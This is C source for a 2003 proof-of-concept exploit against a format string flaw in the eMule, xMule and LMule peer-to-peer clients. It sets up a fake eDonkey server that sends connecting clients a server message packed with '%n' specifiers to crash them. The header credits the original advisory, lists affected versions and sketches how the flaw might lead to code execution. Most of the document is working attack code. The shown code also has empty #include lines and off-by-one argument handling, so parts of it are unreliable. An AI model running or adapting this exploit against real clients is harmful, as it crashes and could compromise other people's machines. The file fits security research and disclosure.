/* * eMule/xMule/LMule OP_SERVERMESSAGE Format String Vulnerability * (SecurityFocus BID 8443) * proof of concept code * version 1.0 (Aug 29 2003) * * by Rémi Denis-Courmont * * This vulnerability was found by: * Stefan Esser * whose original advisory may be fetched from: * http://security.e-matters.de/advisories/022003.html * * Vulnerable: * - eMule v0.29c -> wait for server connection timeout (!?! I need help !?!) * - xMule stable v1.4.3 -> crash * - xMule unstable v1.5.6a -> crash * - Lmule v1.3.1 (NOT tested) -> ??? * * There is something wrong with eMule 0.29c (exception handling) and it * refuses to crash. * * Not vulnerable: * - xMule stable v1.6.0, * - eMule v0.30a. * * As a format string vulnerability over a possibly large format input * buffer, experienced assembly coders (ie. NOT me) should be able to exploit * this vulnerability (you can find as much as 2 mega-bytes available in the * stack in the socket input buffer, and the message is also duplicated on * the heap and can be as long as 65535 bytes). However, getting clients to * connect to while not impossible, will be very very hard: Even though many * clients adds current server of other clients to their own server lists, so * that you can promote yourself as a server by actively connecting to others, * it is unlikely that your "server" will be selected from the list which * often exceeds 100 entries. * Anyway, the following proof-of-concept is entirely passive, so you will * probably only be able to test it against yourself (which is very fine, * because you usually are you only legal victim). */ /***************************************************************************** * Copyright (C) 2003 Rémi Denis-Courmont. All rights reserved. * * * * Redistribution and use in source and binary forms, with or without * * modification, are permitted provided that the following conditions * * are met: * * 1. Redistributions of source code must retain the above copyright * * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * * notice, this list of conditions and the following disclaimer in the * * documentation and/or other materials provided with the distribution. * * * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * *****************************************************************************/ #include #include #include #include #include #include int gai_errno = 0; void gai_perror (const char *str) { if ((gai_errno == EAI_SYSTEM) || (gai_errno == 0)) perror (str); else fprintf (stderr, "%s: %s\n", str, gai_strerror (gai_errno)); } int socket_listen (const char *hostname, const char *servname) { struct addrinfo hints, *res; hints.ai_family = PF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = 0; hints.ai_flags = AI_PASSIVE; if ((gai_errno = getaddrinfo (hostname, servname, &hints, &res)) == 0) { struct addrinfo *ptr; for (ptr = res; ptr != NULL; ptr = ptr->ai_next) { int sock; sock = socket (ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); if (sock != -1) { const int val = 1; setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); if (bind (sock, ptr->ai_addr, ptr->ai_addrlen) || listen (sock, INT_MAX)) close (sock); else { /* success! */ freeaddrinfo (res); return sock; } } } freeaddrinfo (res); } return -1; } int send_server_message (int fd/*, const char *message*/) { /* * Note that eDonkey is an Intel-centric protocol that sends/receives * everything in counter-network-byte order (ie. low order first). */ uint8_t buf[] = "\xE3" // protocol "\x70\x01\x00\x00" // packet size "\x38" // command (Server message) "\x6D\x01" // message length (xMule ingores it, eMule reads it) "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n" "Welcome to messmule, a proof-of-concept for:\n" "eMule/xMule/Lmule OP_SERVERMESSAGE\n" "Format String Vulnerability\n" "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n" "If you can read this message from your Server info box,\n" "your client is probably not affected by that vulnerability.\n" "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n" ; return (send (fd, buf, sizeof (buf) - 1, 0) != (sizeof (buf) - 1)); } static int usage (const char *path) { printf ( "Syntax: %s [port [hostname|IP]]\n" " Attempt to crash eMule/xMule/LMule clients which will connect to\n" " the specified server port (or 4661 by default), at the local\n" " host address (or any available address by default)\n", path); return 2; } int main (int argc, char *argv[]) { puts ("eMule/xMule/LMule OP_SERVERMESSAGE " "Format String Vulnerabilitytion Vulnerability\n" "proof of concept code\n" "Copyright (C) 2003 Rémi Denis-Courmont " "\n"); if (argc > 3) return usage (argv[0]); else { int listenfd; const char *host, *port; port = (argc < 2) ? "4661" : argv[2]; host = (argc < 3) ? NULL : argv[3]; printf ("Binding to [%s]:%s ...\n", (host != NULL) ? host : "any", port); listenfd = socket_listen (host, port); if (listenfd == -1) { gai_perror (host); return 1; } while (1) { int clientfd; fputs ("Waiting for a client to connect ... ", stdout); clientfd = accept (listenfd, NULL, 0); if (clientfd == -1) { puts (""); perror ("Error"); continue; } puts ("OK"); fputs ("Sending server message ... ", stdout); if (send_server_message (clientfd)) { puts (""); perror ("Error"); } else puts ("Done"); close (clientfd); } } return 0; /* dead code */ } // milw0rm.com [2003-09-01]